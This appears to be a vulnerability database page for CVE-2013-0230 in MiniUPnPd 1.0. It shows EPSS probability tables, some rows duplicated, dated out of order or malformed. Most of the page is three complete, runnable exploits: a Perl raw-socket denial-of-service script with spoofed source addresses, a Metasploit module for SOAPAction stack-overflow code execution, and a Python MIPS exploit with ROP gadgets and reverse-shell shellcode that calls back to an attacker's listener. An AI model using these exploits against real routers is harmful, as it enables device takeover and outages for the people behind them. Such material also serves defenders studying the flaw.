CVE-2013-0230 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	79.55%	–	–
2023-01-15	–	–	78%	–	–
2023-03-12	–	–	–	93.2%	–
2023-03-26	–	–	–	92.27%	–
2023-07-02	–	–	–	92.27%	–
2023-10-22	–	–	–	91.71%	–
2023-12-24	–	–	–	90.59%	–
2024-02-25	–	–	–	88.12%	–
2024-06-02	–	–	–	88.12%	–
2024-06-30	–	–	–	85.9%	–
2024-12-22	–	–	–	75.97%	–
2024-12-29	–	–	–	80.43%	–
2025-02-23	–	–	–	78.28%	–
2025-01-19	–	–	–	80.43%	–
2025-02-23	–	–	–	78.28%	–
2025-03-18	–	–	–	–	77.38%
2025-03-18	–	–	–	–	77.38,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	99%
2023-01-15	99%
2023-03-12	98%
2023-03-26	98%
2023-07-02	99%
2023-10-22	99%
2023-12-24	99%
2024-02-25	99%
2024-06-02	99%
2024-06-30	99%
2024-12-22	98%
2024-12-29	99%
2025-02-23	99%
2025-01-19	99%
2025-02-23	99%
2025-03-18	99%
2025-03-18	99%

#!/usr/bin/perl # # miniupnpd/1.0 remote denial of service exploit # # Copyright 2015 (c) Todor Donev # todor.donev@gmail.com # http://www.ethical-hacker.org/ # https://www.facebook.com/ethicalhackerorg # # The SSDP protocol can discover Plug & Play devices, # with uPnP (Universal Plug and Play). SSDP is HTTP # like protocol and work with NOTIFY and M-SEARCH # methods. # # See also: # CVE-2013-0229 # http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0229 # CVE-2013-0230 # http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0230 # # Tested on # Device Name : IMW-C920W # Device Manufacturer : INFOMARK (http://infomark.co.kr) # # These devices are commonly used by Max Telecom, Bulgaria # # Disclaimer: # This or previous program is for Educational # purpose ONLY. Do not use it without permission. # The usual disclaimer applies, especially the # fact that Todor Donev is not liable for any # damages caused by direct or indirect use of the # information or functionality provided by these # programs. The author or any Internet provider # bears NO responsibility for content or misuse # of these programs or any derivatives thereof. # By using these programs you accept the fact # that any damage (dataloss, system crash, # system compromise, etc.) caused by the use # of these programs is not Todor Donev's # responsibility. # # Use at your own risk! # # See also: # SSDP Reflection DDoS Attacks # http://tinyurl.com/mqwj6xt # ####################################### # # # perl miniupnpd.pl # # [ miniupnpd/1.0 remote denial of service exploit ] # [ =============================================== ] # [ Usage: # [ ./miniupnpd.pl <victim address> <spoofed address> # [ Example: # [ perl miniupnpd.pl 192.168.1.1 133.73.13.37 # [ Example: # [ perl miniupnpd.pl 192.168.1.1 # [ =============================================== ] # [ 2015 <todor.donev@gmail.com> Todor Donev 2015 ] # # # nmap -sU 192.168.1.1 -p1900 --script=upnp-info # # Starting Nmap 5.51 ( http://nmap.org ) at 0000-00-00 00:00 EEST # Nmap scan report for 192.168.1.1 # Host is up (0.00078s latency). # PORT STATE SERVICE # 1900/udp open upnp # | upnp-info: # | 192.168.1.1 # | Server: 1.0 UPnP/1.0 miniupnpd/1.0 # | Location: http://192.168.1.1:5000/rootDesc.xml # | Webserver: 1.0 UPnP/1.0 miniupnpd/1.0 # | Name: INFOMARK Router # | Manufacturer: INFOMARK # | Model Descr: INFOMARK Router # | Model Name: INFOMARK Router # | Model Version: 1 # | Name: WANDevice # | Manufacturer: MiniUPnP # | Model Descr: WAN Device # | Model Name: WAN Device # | Model Version: 20070228 # | Name: WANConnectionDevice # | Manufacturer: MiniUPnP # | Model Descr: MiniUPnP daemon # | Model Name: MiniUPnPd # |_ Model Version: 20070228 # MAC Address: 00:00:00:00:00:00 (Infomark Co.) // CENSORED # # Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds # # # perl miniupnpd.pl 192.168.1.1 # # [ miniupnpd/1.0 remote denial of service exploit ] # [ =============================================== ] # [ Target: 192.168.1.1 # [ Send malformed SSDP packet.. # # # nmap -sU 192.168.1.1 -p1900 # # Starting Nmap 5.51 ( http://nmap.org ) at 0000-00-00 00:00 EEST # Nmap scan report for 192.168.1.1 # Host is up (0.00085s latency). # PORT STATE SERVICE # 1900/udp closed upnp // GOOD NIGHT, SWEET PRINCE.... :D # MAC Address: 00:00:00:00:00:00 (Infomark Co.) // CENSORED # # Nmap done: 1 IP address (1 host up) scanned in 0.16 seconds # # # Special thanks to HD Moore .. # use Socket; if ( $< != 0 ) { print "Sorry, must be run as root!\n"; print "This script use RAW Socket.\n"; exit; } my $ip_src = (gethostbyname($ARGV[1]))[4]; my $ip_dst = (gethostbyname($ARGV[0]))[4]; print "\n[ miniupnpd/1.0 remote denial of service exploit ]\n"; print "[ =============================================== ]\n"; select(undef, undef, undef, 0.40); if (!defined $ip_dst) { print "[ Usage:\n[ ./$0 <victim address> <spoofed address>\n"; select(undef, undef, undef, 0.55); print "[ Example:\n[ perl $0 192.168.1.1 133.73.13.37\n"; print "[ Example:\n[ perl $0 192.168.1.1\n"; print "[ =============================================== ]\n"; print "[ 2015 <todor.donev\@gmail.com> Todor Donev 2015 ]\n\n"; exit; } socket(RAW, PF_INET, SOCK_RAW, 255) or die $!; setsockopt(RAW, 0, 1, 1) or die $!; main(); # Main program sub main { my $packet; $packet = iphdr(); $packet .= udphdr(); $packet .= payload(); # b000000m... send_packet($packet); } # IP header (Layer 3) sub iphdr { my $ip_ver = 4; # IP Version 4 (4 bits) my $iphdr_len = 5; # IP Header Length (4 bits) my $ip_tos = 0; # Differentiated Services (8 bits) my $ip_total_len = $iphdr_len + 20; # IP Header Length + Data (16 bits) my $ip_frag_id = 0; # Identification Field (16 bits) my $ip_frag_flag = 000; # IP Frag Flags (R DF MF) (3 bits) my $ip_frag_offset = 0000000000000; # IP Fragment Offset (13 bits) my $ip_ttl = 255; # IP TTL (8 bits) my $ip_proto = 17; # IP Protocol (8 bits) my $ip_checksum = 0; # IP Checksum (16 bits) my $ip_src=gethostbyname(&randip) if !$ip_src; # IP Source (32 bits) # IP Packet construction my $iphdr = pack( 'H2 H2 n n B16 h2 c n a4 a4', $ip_ver . $iphdr_len, $ip_tos, $ip_total_len, $ip_frag_id, $ip_frag_flag . $ip_frag_offset, $ip_ttl, $ip_proto, $ip_checksum, $ip_src, $ip_dst ); return $iphdr; } # UDP header (Layer 4) sub udphdr { my $udp_src_port = 31337; # UDP Sort Port (16 bits) (0-65535) my $udp_dst_port = 1900; # UDP Dest Port (16 btis) (0-65535) my $udp_len = 8 + length(payload()); # UDP Length (16 bits) (0-65535) my $udp_checksum = 0; # UDP Checksum (16 bits) (XOR of header) # UDP Packet my $udphdr = pack( 'n n n n', $udp_src_port, $udp_dst_port, $udp_len, $udp_checksum ); return $udphdr; } # Create SSDP Bomb sub payload { my $data; my $head; $data = "M-SEARCH * HTTP\/1.1\\r\\n"; for (0..1260) { $data .= chr( int(rand(25) + 65) ); } my $payload = pack('a' . length($data), $data); return $payload; } # Generate random source ip address sub randip () { srand(time() ^ ($$ + ($$ << 15))); my $ipdata; $ipdata = join ('.', (int(rand(255)), int(rand(255)), int(rand(255)), int(rand(255)))), "\n"; my $ipsrc = pack('A' . length($ipdata), rand($ipdata)); return $ipdata; } # Send the malformed packet sub send_packet { print "[ Target: $ARGV[0]\n"; select(undef, undef, undef, 0.30); print "[ Send malformed SSDP packet..\n\n"; send(RAW, $_[0], 0, pack('Sna4x8', PF_INET, 60, $ip_dst)) or die $!; }

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient Rank = NormalRanking def initialize(info = {}) super(update_info(info, 'Name' => 'MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution', 'Description' => %q{ This module exploits the MiniUPnP 1.0 SOAP stack buffer overflow vulnerability present in the SOAPAction HTTP header handling. }, 'Author' => [ 'hdm', # Vulnerability discovery 'Dejan Lukan' # Metasploit module ], 'License' => MSF_LICENSE, 'DefaultOptions' => { 'EXITFUNC' => 'process', }, # the byte '\x22' is the '"' character and the miniupnpd scans for that character in the # input, which is why it can't be part of the shellcode (otherwise the vulnerable part # of the program is never reached) 'Payload' => { 'Space' => 2060, 'BadChars' => "\x00\x22", 'DisableNops' => true }, 'Platform' => 'linux', 'References' => [ [ 'CVE', '2013-0230' ], [ 'OSVDB', '89624' ], [ 'BID', '57608' ], [ 'URL', 'https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play'] ], 'Targets' => [ [ 'Debian GNU/Linux 6.0 / MiniUPnPd 1.0', { 'Ret' => 0x0804ee43, # pop ebp # ret # from miniupnpd 'Offset' => 2123 } ], ], 'DefaultTarget' => 0, 'Privileged' => false, 'DisclosureDate' => 'Mar 27 2013', )) register_options([ Opt::RPORT(5555), ], self.class) end def exploit # # Build the SOAP Exploit # # jmp 0x2d ; jump forward 0x2d bytes (jump right after the '#' char) sploit = "\xeb\x2d" # a valid action sploit += "n:schemas-upnp-org:service:WANIPConnection:1#" # payload sploit += payload.encoded # nops sploit += rand_text(target['Offset'] - sploit.length - 16) # overwrite registers on stack: the values are not used, so we can overwrite them with anything sploit += rand_text(4) # overwrite EBX sploit += rand_text(4) # overwrite ESI sploit += rand_text(4) # overwrite EDI sploit += rand_text(4) # overwrite EBP # Overwrite EIP with addresss of "pop ebp, ret", because the second value on the # stack points directly to the string after 'Soapaction: ', which is why we must # throw the first value on the stack away, which we're doing with the pop ebp # instruction. Then we're returning to the next value on the stack, which is # exactly the address that we want. sploit += [target.ret].pack('V') # the ending " character is necessary for the vulnerability to be reached sploit += "\"" # data sent in the POST body data = "<?xml version='1.0' encoding=\"UTF-8\"?>\r\n" + "<SOAP-ENV:Envelope\r\n" + " SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\n" + " xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\n" + " xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\"\r\n" + ">\r\n" + "<SOAP-ENV:Body>\r\n" + "<ns1:action xmlns:ns1=\"urn:schemas-upnp-org:service:WANIPConnection:1\" SOAP-ENC:root=\"1\">\r\n" + "</ns1:action>\r\n" + "</SOAP-ENV:Body>\r\n" + "</SOAP-ENV:Envelope>\r\n" # # Build and send the HTTP request # print_status("Sending exploit to victim #{target.name} at ...") send_request_cgi({ 'method' => 'POST', 'uri' => "/", 'headers' => { 'SOAPAction' => sploit, }, 'data' => data, }) # disconnect from the server disconnect end end

#!/usr/bin/env python # Exploit Title: MiniUPnPd 1.0 Stack Overflow RCE for AirTies RT Series # Date: 26.04.2015 # Exploit Author: Onur ALANBEL (BGA) # Vendor Homepage: http://miniupnp.free.fr/ # Version: 1.0 # Architecture: MIPS # Tested on: AirTies RT-204v3 # CVE : 2013-0230 # Exploit gives a reverse shell to lhost:lport # Details: https://www.exploit-db.com/docs/english/36806-developing-mips-exploits-to-hack-routers.pdf import urllib2 from string import join from argparse import ArgumentParser from struct import pack from socket import inet_aton BYTES = 4 def hex2str(value, size=BYTES): data = "" for i in range(0, size): data += chr((value >> (8*i)) & 0xFF) data = data[::-1] return data arg_parser = ArgumentParser(prog="miniupnpd_mips.py", description="MiniUPnPd \ CVE-2013-0230 Reverse Shell exploit for AirTies \ RT Series, start netcat on lhost:lport") arg_parser.add_argument("--target", required=True, help="Target IP address") arg_parser.add_argument("--lhost", required=True, help="The IP address\ which nc is listening") arg_parser.add_argument("--lport", required=True, type=int, help="The\ port which nc is listening") args = arg_parser.parse_args() libc_base = 0x2aabd000 ra_1 = hex2str(libc_base + 0x36860) # ra = 1. gadget s1 = hex2str(libc_base + 0x1636C) # s1 = 2. gadget sleep = hex2str(libc_base + 0x35620) # sleep function ra_2 = hex2str(libc_base + 0x28D3C) # ra = 3. gadget s6 = hex2str(libc_base + 0x1B19C) # ra = 4.gadget s2 = s6 lport = pack('>H', args.lport) lhost = inet_aton(args.lhost) shellcode = join([ "\x24\x11\xff\xff" "\x24\x04\x27\x0f" "\x24\x02\x10\x46" "\x01\x01\x01\x0c" "\x1e\x20\xff\xfc" "\x24\x11\x10\x2d" "\x24\x02\x0f\xa2" "\x01\x01\x01\x0c" "\x1c\x40\xff\xf8" "\x24\x0f\xff\xfa" "\x01\xe0\x78\x27" "\x21\xe4\xff\xfd" "\x21\xe5\xff\xfd" "\x28\x06\xff\xff" "\x24\x02\x10\x57" "\x01\x01\x01\x0c" "\xaf\xa2\xff\xff" "\x8f\xa4\xff\xff" "\x34\x0f\xff\xfd" "\x01\xe0\x78\x27" "\xaf\xaf\xff\xe0" "\x3c\x0e" + lport + "\x35\xce" + lport + "\xaf\xae\xff\xe4" "\x3c\x0e" + lhost[:2] + "\x35\xce" + lhost[2:4] + "\xaf\xae\xff\xe6" "\x27\xa5\xff\xe2" "\x24\x0c\xff\xef" "\x01\x80\x30\x27" "\x24\x02\x10\x4a" "\x01\x01\x01\x0c" "\x24\x0f\xff\xfd" "\x01\xe0\x78\x27" "\x8f\xa4\xff\xff" "\x01\xe0\x28\x21" "\x24\x02\x0f\xdf" "\x01\x01\x01\x0c" "\x24\x10\xff\xff" "\x21\xef\xff\xff" "\x15\xf0\xff\xfa" "\x28\x06\xff\xff" "\x3c\x0f\x2f\x2f" "\x35\xef\x62\x69" "\xaf\xaf\xff\xec" "\x3c\x0e\x6e\x2f" "\x35\xce\x73\x68" "\xaf\xae\xff\xf0" "\xaf\xa0\xff\xf4" "\x27\xa4\xff\xec" "\xaf\xa4\xff\xf8" "\xaf\xa0\xff\xfc" "\x27\xa5\xff\xf8" "\x24\x02\x0f\xab" "\x01\x01\x01\x0c" ], '') payload = 'C'*2052 + s1 + 'C'*(4*4) + s6 + ra_1 + 'C'*28 + sleep + 'C'*40 + s2\ + ra_2 + 'C'*32 + shellcode soap_headers = { 'SOAPAction': "n:schemas-upnp-org:service:WANIPConnection:1#" + payload, } soap_data = """ <?xml version='1.0' encoding="UTF-8"?> <SOAP-ENV:Envelope SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" > <SOAP-ENV:Body> <ns1:action xmlns:ns1="urn:schemas-upnp-org:service:WANIPConnection:1"\ SOAP-ENC:root="1"> </ns1:action> </SOAP-ENV:Body> </SOAP-ENV:Envelope> """ try: print "Exploiting..." req = urllib2.Request("http://" + args.target + ":5555", soap_data, soap_headers) res = urllib2.urlopen(req).read() except: print "Ok"